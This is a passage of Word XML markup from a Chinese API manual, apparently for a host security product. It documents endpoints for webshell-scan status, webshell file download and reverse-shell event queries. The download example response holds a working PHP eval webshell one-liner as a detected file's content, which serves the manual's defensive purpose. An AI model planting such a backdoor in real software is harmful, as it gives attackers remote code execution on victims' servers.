    <w:p w14:paraId="3F1883A3"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BC669E" w14:paraId="7F20E0E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A7EE10D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608C8B95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD3C77F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="799909FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19482C1A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B60444D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2728FDBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A9B053D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5824DD3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00D0AB1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="297" w:name="_Toc115166221"/>
      <w:bookmarkStart w:id="298" w:name="web后门查询扫描状态"/>
      <w:bookmarkEnd w:id="296"/>
      <w:r>
        <w:t>Web后门查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p w14:paraId="6040CD20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web后门扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A25CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D594BB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15B9A8CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DC912" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70677008" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41E176" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39733DC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15155023" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB01093"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="6614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C82C6C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678CAA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3302DD81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF8753C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B62A54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48D2DAAC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7011DB6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="781BB18C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597736AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D797D90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-1:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>无任务</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>0:未开始执行 1:排队执行 2:正在执行 3:执行成功 4:执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C1BDEC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="299" w:name="_Toc115166222"/>
      <w:bookmarkStart w:id="300" w:name="web后门-文件下载"/>
      <w:bookmarkEnd w:id="298"/>
      <w:r>
        <w:t>Web后门-文件下载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w14:paraId="343DB65B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web后门文件下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E89A0E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE30E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/download/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD610B7"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FF2A5D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B4C0251" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E019BFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ECA2C74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D181536" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64772816" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD1E2AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F20D6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F9A467" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1424D7CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A49CDAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C643F17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/webshell/{linux|win}/download/5a790f0b7d761b6bc78e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD515A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC2EF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "content": "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ufeff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> @eval($_POST['c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;\n"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0991787E"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082"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="488266A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CC8424E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19A47D95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56728F66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F426D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64BDDE84" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DA849F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fileName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C2A5EE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1087730D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375576DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60D7F626" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630E4CCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36A59FC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AEE80F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AD53826" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="580B02D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="_Toc115166223"/>
      <w:bookmarkStart w:id="302" w:name="反弹shellwindowslinux"/>
      <w:bookmarkEnd w:id="292"/>
      <w:bookmarkEnd w:id="300"/>
      <w:r>
        <w:t>反弹shell(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Windows&amp;Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="301"/>
    </w:p>
    <w:p w14:paraId="39780529" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc115166224"/>
      <w:bookmarkStart w:id="304" w:name="查询结果-4"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
    </w:p>
    <w:p w14:paraId="4C6ACBB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Windows和Linux反弹shell上报事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814F7F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17791D64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>//windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bounceshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/win</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bounceshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C693F53"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519"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7541909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CAF1D43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3502391B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31558944" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="397FC1FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21C0CAC2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F5441CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6D2C9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D556678" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
